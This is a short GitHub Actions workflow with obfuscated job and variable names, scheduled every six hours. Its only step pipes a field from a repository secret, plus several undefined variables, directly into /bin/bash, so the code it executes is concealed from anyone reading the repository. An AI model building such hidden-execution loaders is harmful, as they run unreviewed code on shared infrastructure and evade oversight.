name: yanqing19871010

on:
  workflow_dispatch:
  schedule:
    - cron: '58 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yanqing19871010
        env:
          pr9853: ${{ secrets.pr9853 }}
        run: |
          echo $pr9853 | jq -r .qmfr40685 | /bin/bash
          echo $qbfrw77075 | jq -r .b2 | /bin/bash
          echo $b23150 | jq -r .ki579 | /bin/bash
          echo $y69092 | jq -r .u05009 | /bin/bash
          echo $lw789 | jq -r .a58 | /bin/bash

